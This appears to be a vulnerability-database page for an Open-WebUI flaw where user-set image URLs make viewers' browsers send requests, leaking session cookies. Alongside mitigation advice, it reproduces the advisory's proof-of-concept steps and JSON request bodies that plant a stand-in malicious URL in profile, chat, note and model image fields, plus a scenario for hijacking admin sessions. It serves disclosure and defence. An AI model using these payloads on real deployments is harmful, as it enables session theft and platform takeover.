CVE-2026-45317: Open-WebUI: CSRF image URL leaks session cookies

GHSA-j6w6-986j-2m2m MEDIUM PoC AVAILABLE CISA: TRACK*
Published May 14, 2026
CISO Take

Open-WebUI versions 0.9.2 and earlier contain an application-wide vulnerability where any authenticated user can set a malicious external URL as an image — in profile pictures, model icons, shared chats, or shared notes — causing every user who views that content to silently send a browser GET request to an attacker-controlled server, exposing session cookies, IP addresses, and browser fingerprints without any deliberate victim action. The blast radius is broad: 12 identified rendering locations are vulnerable, and a low-privileged attacker can specifically target administrators by planting a malicious profile image URL that fires when any admin visits /admin/users/overview, enabling full platform takeover via session hijacking. With 91 prior CVEs on this package and exploitation requiring only a standard user account, the CVSS 4.6 medium score underestimates the real risk in multi-user enterprise deployments where Open-WebUI serves as the shared interface to internal LLM infrastructure. Upgrade to open-webui v0.9.3 immediately; if patching is delayed, restrict the instance to trusted users, disable public chat and note sharing, and implement egress filtering to block unexpected external GET requests from the Open-WebUI host.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Despite a medium CVSS score of 4.6, real-world risk is elevated in multi-user Open-WebUI deployments. The attack requires only a valid user account (low privilege) and user interaction is passive — images render automatically without victims doing anything beyond visiting a page. The admin panel attack vector is especially dangerous: any user who plants a malicious profile image URL will capture admin session cookies the next time an administrator views the user list. Twelve identified attack surfaces across the application make partial mitigation unreliable without the full patch. The package's history of 91 prior CVEs signals persistent security debt in the codebase.

How does the attack unfold?

Initial Access
Attacker authenticates with a low-privilege Open-WebUI user account and identifies image URL fields in profiles, models, chats, and notes as unsanitized injection points.
AML.T0049
Weaponization
Attacker registers a malicious HTTP logging server and sets profile_image_url (or model/chat/note image URLs) to point to it via direct API calls, planting the trap for future victims.
AML.T0087
Credential Harvest
Victim's browser automatically sends a GET request to the attacker's server when rendering the image during normal platform use, leaking session cookies, IP address, and user-agent without any click or interaction.
AML.T0025
Impact
Attacker replays the captured admin session cookie to gain full unauthorized access to the platform — model configurations, user management, API keys, and the complete conversation history of all users.
AML.T0048.003

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Open WebUI pip <= 0.9.2 0.9.3
143.3K Pushed 8d ago 77% patched ~5d to patch Full package profile →

Do you use Open WebUI? You're affected.

How severe is it?

CVSS 3.1
4.6 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 6% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI Required
S Unchanged
C Low
I None
A Low

What should I do?

5 steps
  1. Patch: Upgrade open-webui to v0.9.3 or later — the fix is documented in GHSA-j6w6-986j-2m2m.

  2. Workaround (if unable to patch): Disable public chat and note sharing; restrict Open-WebUI access to trusted internal users only; implement a Content Security Policy that allowlists only internal image sources.

  3. Network control: Configure egress filtering on the Open-WebUI host to block HTTP/HTTPS GET requests from the application to unexpected external domains.

  4. Detection: Audit proxy and WAF logs for external GET requests originating from your Open-WebUI instance to non-whitelisted domains; query the database for non-local URLs in profile_image_url fields and model profile_image_url fields; alert on image URL modifications via the user or model APIs.

  5. Post-patch audit: Scan existing user profiles, model configurations, shared chats, and notes for malicious image URLs already planted before patching.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.5 - Measures addressing cybersecurity of AI systems
NIST AI RMF
MANAGE 2.4 - Mechanisms for detecting and responding to AI risks
OWASP LLM Top 10
LLM06 - Sensitive Information Disclosure

Frequently Asked Questions

What is CVE-2026-45317?

Open-WebUI versions 0.9.2 and earlier contain an application-wide vulnerability where any authenticated user can set a malicious external URL as an image — in profile pictures, model icons, shared chats, or shared notes — causing every user who views that content to silently send a browser GET request to an attacker-controlled server, exposing session cookies, IP addresses, and browser fingerprints without any deliberate victim action. The blast radius is broad: 12 identified rendering locations are vulnerable, and a low-privileged attacker can specifically target administrators by planting a malicious profile image URL that fires when any admin visits /admin/users/overview, enabling full platform takeover via session hijacking. With 91 prior CVEs on this package and exploitation requiring only a standard user account, the CVSS 4.6 medium score underestimates the real risk in multi-user enterprise deployments where Open-WebUI serves as the shared interface to internal LLM infrastructure. Upgrade to open-webui v0.9.3 immediately; if patching is delayed, restrict the instance to trusted users, disable public chat and note sharing, and implement egress filtering to block unexpected external GET requests from the Open-WebUI host.

Is CVE-2026-45317 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-45317, increasing the risk of exploitation.

How to fix CVE-2026-45317?

1. Patch: Upgrade open-webui to v0.9.3 or later — the fix is documented in GHSA-j6w6-986j-2m2m. 2. Workaround (if unable to patch): Disable public chat and note sharing; restrict Open-WebUI access to trusted internal users only; implement a Content Security Policy that allowlists only internal image sources. 3. Network control: Configure egress filtering on the Open-WebUI host to block HTTP/HTTPS GET requests from the application to unexpected external domains. 4. Detection: Audit proxy and WAF logs for external GET requests originating from your Open-WebUI instance to non-whitelisted domains; query the database for non-local URLs in profile_image_url fields and model profile_image_url fields; alert on image URL modifications via the user or model APIs. 5. Post-patch audit: Scan existing user profiles, model configurations, shared chats, and notes for malicious image URLs already planted before patching.

What systems are affected by CVE-2026-45317?

This vulnerability affects the following AI/ML architecture patterns: AI model serving interfaces, Multi-user AI workspaces, Self-hosted LLM deployments.

What is the CVSS score for CVE-2026-45317?

CVE-2026-45317 has a CVSS v3.1 base score of 4.6 (MEDIUM). The EPSS exploitation probability is 0.17%.

What is the AI security impact?

Affected AI Architectures

AI model serving interfacesMulti-user AI workspacesSelf-hosted LLM deployments

MITRE ATLAS Techniques

AML.T0025 Exfiltration via Cyber Means
AML.T0048.003 User Harm
AML.T0049 Exploit Public-Facing Application
AML.T0087 Gather Victim Identity Information

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.5
NIST AI RMF: MANAGE 2.4
OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

## Summary An application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This can be exploited in various locations, including: • Profile picture • Model picture • Hidden images in shared chats • Images within shared notes ## Details ### Vulnerable Code: This appears to occur in most locations where images can be uploaded/rendered. Here are found sinks: **Profile Image in chat** • Note: rendering profile picture in chat • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ProfileImage.svelte#L16Code **Profile Picture edit** • Note: Profile picture rendering in edit • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Settings/Account.svelte#L205 **Profile Image Navbar** • Note: Profile picture rendering in navbar • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Navbar.svelte#L237 **Profile Image UserList** • Note: rendering images in user list admin panel • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Users/UserList.svelte#L399 **Images in chat** • Note: rendering images in chat • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/Image.svelte#L35 **Image in chat** • Note: Image sent in chat • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/channel/Messages/Message.svelte#L192 **Model image in chat** • Note: Model image rendering in chat • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Placeholder.svelte#L128 **Model image in chat response** • Note: Model image rendering in the assistant response • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ResponseMessage.svelte#L612 **Model Image Admin settings** • Note: Model image rendering in the admin settings • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Settings/Models.svelte#L336 **Model Image Workspace** • Note: Model image rendering in the workspace • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models.svelte#L336 **Model Image Edit** • Note: Model image rendering in the edit modal • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models/ModelEditor.svelte#L407 **Image in Notes** • Note: Image rendering in shared note • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/RichTextInput/Image/image.ts#L140 • Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/UserMessage.svelte#L184 **Root Cause** 1. Insecure display of image • Application is sending a GET request to the unvalidated image url 2. Lack of Input Validation • Image url is not validated for filetype ## PoCs ### PoC (profile picture) **Environment** • Open-WebUl latest version (v0.6.41) • Valid user **Step 1: Create a Malicious Link** • Set up a server to obtain victim's cookies, ip, referer, user-agent, etc **Step 2: Profile Image URL** 1. Add user 1. Change the profile image url parameter to the malicious URL (server was used for PoC) 2. Example POST request: <img width="1245" height="484" alt="image" src="https://github.com/user-attachments/assets/295f0ab0-fe41-4d50-9c38-cb8c51a3bca2" /> 4. Repeat action 1. Repeat for userSignUp, updateUserProfile, and update **Step 3: View Image on Victim Admin Account** 1. Log into an admin account 2. Visit the admin panel (/admin/users/overview) 3. Notice the GET request sent to the malicious URL **Step 4: Verify User Information Is Sent** 1. Confirm user information is sent <img width="1280" height="677" alt="image" src="https://github.com/user-attachments/assets/cb2f4039-167f-43f4-bd37-ffaf4d476cee" /> ### PoC (chat) **Environment** • Open-WebUl latest version (v0.6.41) • Valid user **Step 1: Create a Malicious Link** • Set up a server to obtain victim's cookies, ip, referer, use-agent, etc **Step 2: Start chat** 1. Start chat 1. Send a message 2. Resend POST request 1. Resend post request to this endpoint /api/v1/chats/[chat_id_here] 2. Add in a file with type set to image and the url set to the malicious link 3. Replace models/ids/malicious_url_here with what is applicable 4. {"chat":{"models":["redacted"],"history":{"messages":{"id_here":{"id":"id_here","parentId":"id_here","childrenIds":["id_here"],"role":"user","content":"","files":[{"type":"image","url":"MALICIOUS_URL_HERE"}],"timestamp":1765978991,"models":["redacted"]}}},"params":{},"files":[]}} <img width="646" height="593" alt="image" src="https://github.com/user-attachments/assets/1273fe2b-3b3b-45dc-9c52-6811f7b18667" /> 3. Share chat 1. Copy link to share the chat **Step 3: View Image on Victim Account** 1. Log into a valid account 2. Open the shared chat 3. Notice the GET request sent to the malicious URL from the hidden image on the page <img width="1384" height="500" alt="image" src="https://github.com/user-attachments/assets/bd6e220d-e039-4916-9865-5ce9f0939951" /> **Step 4: Verify User Information Is Sent** 1. Confirm user information is sent <img width="1480" height="797" alt="image" src="https://github.com/user-attachments/assets/78374c2e-d9c6-476b-944d-1c8230398989" /> ### PoC (notes) **Environment** • Open WebUI latest version (v0.6.41) • Valid user with access to notes **Step 1: Create a Malicious Link** • Set up a server to obtain victim's cookies, ip, referer, use-agent, etc **Step 2: Create Note** 1. Resend POST request to /api/v1/notes/[note_id_here]/update 2. Add in the malicious URL to a file 3. Example parameters 1.  (replace the ID_HERE with valid ID and MALICIOUS_URL_HERE with the malicious URL): 2. `{"title":"2025-12-17","data":{"files":[{"id":"ID_HERE","type":"image","url":"MALICIOUS_URL_HERE"}]},"access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}}}` <img width="892" height="662" alt="image" src="https://github.com/user-attachments/assets/325a9bfa-2fb3-45be-aeec-e5695085d7d0" /> 4. Refresh page and notice the request being sent to the malicious URL 5. Share note and copy link **Step 5: View Note on Valid Account** 1. Log into a valid account 2. Open the shared note 3. Notice the GET request sent to the malicious URL from the hidden image on the page <img width="1597" height="317" alt="image" src="https://github.com/user-attachments/assets/767d865b-04a0-42b9-82fc-122acb9cbf16" /> **Step 6: Verify User Information Is Sent** 1. Verify that user information is sent. <img width="1997" height="860" alt="image" src="https://github.com/user-attachments/assets/b0ecab88-9830-4fb4-ac18-acda9eb44ff7" /> ### PoC (model) **Environment** • Open WebUI latest version (v0.6.41) • Admin user **Step 1: Create a Malicious Link** • Set up a server to obtain victim's cookies, ip, referer, use-agent, etc **Step 2: Create Model** 1. Navigate to /workspace/models 2. Create or edit a model 3. Send a POST request to /api/v1/models/create or /api/v1/models/model/update?id=[model_id] 1. Change the profile_image_url to the malicious link 2. Example parameters: 3. `{"id":"model_test","base_model_id":"redacted","name":"MODEL_TEST","meta":{"profile_image_url":"MALICIOUS_URL_HERE","description":null,"suggestion_prompts":null,"tags":[],"capabilities":{"vision":true,"file_upload":true,"web_search":true,"image_generation":true,"code_interpreter":true,"citations":true,"usage":false}},"params":{},"access_control":null}` <img width="887" height="618" alt="image" src="https://github.com/user-attachments/assets/749dac39-0b9d-4b7e-815d-fd6f3f7c57bd" /> **Step 3: View Image on Valid Account** 1. Log into a valid account 2. Create chat with the model 3. Notice a GET request is sent to the malicious url 4. All users starting a chat with that model will be vulnerable to the attack <img width="1852" height="468" alt="image" src="https://github.com/user-attachments/assets/ff69c0a2-326d-4b99-9d8c-a73d9aa0deff" /> **Step 4:  View Image on Admin Account** 1. Navigate to /workspace/models 2. Notice GET request sent to malicious url <img width="1793" height="482" alt="image" src="https://github.com/user-attachments/assets/bda6e687-ccad-4914-a779-281dc67ffcfe" /> **Step 5: Verify User Information Is Sent** 1. On the set up server verify that improperly set cookies are sent, IP, user-agent, etc. <img width="1687" height="910" alt="image" src="https://github.com/user-attachments/assets/c783ad50-6701-4df8-8beb-ba0957baa2d9" /> ### Other Attack Examples - Alternative malicious links - Signout of Open WebUI - /api/v1/auths/signout - Internal network endpoints - Signout of other applications - Resource intensive endpoints - Etc ### Recommended Fix - Store images - Instead of sending a GET request to load the image each time, store the image and render on the page - Validate input - Image file types should be whitelisted (examples: .jpg, .png, .gif, .jpeg, etc) ## Impact ### Vulnerability Type - CWE-352: Cross-Site Request Forgery (CSRF) - CWE-20: Improper Input Validation ### Affected users - All authenticated users The impact of this vulnerability is significant. This application-wide vulnerability allows an attacker to perform actions on behalf of any user who views the compromised image. This can be particularly damaging if an administrator or privileged user views the image, as it could lead to elevated access or sensitive data exposure.

Exploitation Scenario

An attacker with a basic Open-WebUI account stands up a simple HTTP logging server and updates their profile_image_url to point at it via the user profile API. When an administrator next visits /admin/users/overview to review accounts, the admin's browser automatically fetches the attacker's URL to render the profile image, including the admin's session cookie in the request headers. The attacker captures the session token and replays it to authenticate as the administrator, gaining full control over all model configurations, API keys, user accounts, and the entire conversation history stored in the platform — which may contain sensitive business data, internal IP, or credentials passed to the LLM. For maximum reach, the attacker alternatively sets the malicious URL as a popular shared model's profile image, passively harvesting cookies from every user who starts a chat with that model.

Weaknesses (CWE)

CWE-20 — Improper Input Validation: The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

  • [Architecture and Design] Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build "recognizers" for that language. This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111]
  • [Architecture and Design] Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173).

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L

Timeline

Published
May 14, 2026
Last Modified
May 14, 2026
First Seen
May 15, 2026

Related Vulnerabilities